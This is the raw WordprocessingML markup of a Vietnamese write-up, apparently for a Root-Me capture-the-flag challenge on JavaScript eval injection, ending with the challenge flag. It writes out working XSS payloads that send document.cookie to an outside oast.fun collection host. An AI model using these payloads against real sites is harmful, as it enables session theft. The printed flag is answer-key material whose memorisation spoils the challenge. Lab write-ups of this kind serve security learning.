    </w:p>
    <w:p w14:paraId="588FB4DB" w14:textId="7BC47FD4" w:rsidR="002A210E" w:rsidRDefault="002A210E" w:rsidP="00CA4612">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C68EED0" w14:textId="059641D6" w:rsidR="00691FE6" w:rsidRDefault="00691FE6" w:rsidP="00CA46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Để thực thi được script, mình đã dùng payload </w:t>
      </w:r>
      <w:r w:rsidR="00EF01D7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sau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60FFC85" w14:textId="1E575AC1" w:rsidR="00691FE6" w:rsidRDefault="00691FE6" w:rsidP="00CA4612">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18415FD4" w14:textId="564B044F" w:rsidR="00691FE6" w:rsidRDefault="00691FE6" w:rsidP="00CA4612">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00691FE6">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1+1-alert`1`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00691FE6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>Perfect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F1206C" w14:textId="3B757AEB" w:rsidR="00410379" w:rsidRDefault="00410379" w:rsidP="00CA4612">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24F95F3E" w14:textId="09EED555" w:rsidR="00410379" w:rsidRDefault="00410379" w:rsidP="00CA46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Làm sao để lấy cookie đây? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53966680" w14:textId="41046166" w:rsidR="00410379" w:rsidRDefault="00410379" w:rsidP="00CA4612">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32D981F5" w14:textId="044BE5AB" w:rsidR="00F75108" w:rsidRDefault="00410379" w:rsidP="00F75108">
      <w:pPr>
        <w:ind w:left="-1134" w:right="-1559" w:firstLine="113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Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB686FE" w14:textId="77777777" w:rsidR="001B3F5E" w:rsidRDefault="001B3F5E" w:rsidP="001B3F5E">
      <w:pPr>
        <w:ind w:left="-1134" w:right="-1559"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70504738" w14:textId="77777777" w:rsidR="00EF01D7" w:rsidRDefault="00410379" w:rsidP="00EF01D7">
      <w:pPr>
        <w:ind w:right="-1559"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F75108">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1+1</w:t>
      </w:r>
      <w:r w:rsidR="00F75108" w:rsidRPr="00F75108">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00F75108">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>location.assign`http://ce6phne2vtc00004spq0g8dme4wyyyyyb.oast.fun</w:t>
      </w:r>
      <w:r w:rsidR="00F75108" w:rsidRPr="00F75108">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/?c=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601963A3" w14:textId="7068674F" w:rsidR="00410379" w:rsidRDefault="001B3F5E" w:rsidP="00EF01D7">
      <w:pPr>
        <w:ind w:right="-155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highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>${document.cookie}</w:t>
      </w:r>
      <w:r w:rsidR="00410379" w:rsidRPr="00F75108">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D60595" w14:textId="4AA0EDBC" w:rsidR="001B3F5E" w:rsidRDefault="001B3F5E" w:rsidP="00F75108">
      <w:pPr>
        <w:ind w:left="-1134" w:right="-1559"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ACD1F83" w14:textId="0B88A766" w:rsidR="001B3F5E" w:rsidRDefault="001B3F5E" w:rsidP="001B3F5E">
      <w:pPr>
        <w:ind w:right="-155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Nó đã chuyển hướng được nhưng không lấy được cookie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148AB53F" w14:textId="2857E66A" w:rsidR="001B3F5E" w:rsidRDefault="001B3F5E" w:rsidP="001B3F5E">
      <w:pPr>
        <w:ind w:right="-1559"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="041C4729" w14:textId="62BEEAD8" w:rsidR="00410379" w:rsidRDefault="001B3F5E" w:rsidP="00410379">
      <w:pPr>
        <w:ind w:right="-84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này cho phép mình chèn template Javascript:  `${//Javascript code}`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514438BC" w14:textId="41415D16" w:rsidR="001B3F5E" w:rsidRDefault="001B3F5E" w:rsidP="00410379">
      <w:pPr>
        <w:ind w:right="-846"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="039CF834" w14:textId="71CA21F9" w:rsidR="001B3F5E" w:rsidRDefault="001B3F5E" w:rsidP="00410379">
      <w:pPr>
        <w:ind w:right="-84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Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72864EDB" w14:textId="77777777" w:rsidR="001B3F5E" w:rsidRDefault="001B3F5E" w:rsidP="00410379">
      <w:pPr>
        <w:ind w:right="-846"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0965F44D" w14:textId="5744971C" w:rsidR="00EF01D7" w:rsidRPr="00EF01D7" w:rsidRDefault="001B3F5E" w:rsidP="00EF01D7">
      <w:pPr>
        <w:ind w:right="-846"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF01D7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1+1</w:t>
      </w:r>
      <w:r w:rsidR="00EF01D7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF01D7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>`${document.location="http://ce6phne2vtc00004spq0g8dme4wyyyyyb.oast.fun/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B6DDAF" w14:textId="52C9238F" w:rsidR="001B3F5E" w:rsidRDefault="001B3F5E" w:rsidP="00EF01D7">
      <w:pPr>
        <w:ind w:right="-846"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF01D7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>+document.cookie}`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFABE11" w14:textId="605A7A1A" w:rsidR="001B3F5E" w:rsidRDefault="001B3F5E" w:rsidP="001B3F5E">
      <w:pPr>
        <w:ind w:left="-1134" w:right="-846"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A0B0ED1" w14:textId="6F0FB030" w:rsidR="001B3F5E" w:rsidRDefault="001B3F5E" w:rsidP="001B3F5E">
      <w:pPr>
        <w:ind w:right="-84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Cách này dễ hơn nhiều </w:t>
      </w:r>
      <w:r w:rsidRPr="001B3F5E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F04A"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E70342" w14:textId="55C35428" w:rsidR="001B3F5E" w:rsidRDefault="001B3F5E" w:rsidP="001B3F5E">
      <w:pPr>
        <w:ind w:right="-84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180637E" w14:textId="1CFF8B6B" w:rsidR="00EF01D7" w:rsidRPr="00EF01D7" w:rsidRDefault="00EF01D7" w:rsidP="001B3F5E">
      <w:pPr>
        <w:ind w:right="-846"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF01D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>flag=rootme{Eval_Is_DangER0us}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F0BA85" w14:textId="7E303FA1" w:rsidR="00410379" w:rsidRDefault="00410379" w:rsidP="00410379">
      <w:pPr>
        <w:ind w:right="-846"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C05EFFD" w14:textId="77777777" w:rsidR="00410379" w:rsidRPr="002A210E" w:rsidRDefault="00410379" w:rsidP="00410379">
      <w:pPr>
        <w:ind w:right="-846"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00410379" w:rsidRPr="002A210E" w:rsidSect="00F75108">
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1440" w:right="15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CA"/>
    <w:rsid w:val="001B3F5E"/>
    <w:rsid w:val="002A210E"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="00360C49"/>
    <w:rsid w:val="00410379"/>
    <w:rsid w:val="004B29CC"/>
    <w:rsid w:val="006214CA"/>
    <w:rsid w:val="00691FE6"/>
    <w:rsid w:val="008677F3"/>
    <w:rsid w:val="008C451E"/>
    <w:rsid w:val="009036D1"/>
    <w:rsid w:val="00A16506"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00CA4612"/>
    <w:rsid w:val="00CF1F41"/>
    <w:rsid w:val="00EF01D7"/>
    <w:rsid w:val="00F75108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63F8B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3C560FB9-EA2F-9C43-9452-EB3B6ACC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2022-12-05T15:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-12-07T05:35:00Z</dcterms:modified>
</cp:coreProperties>
</file>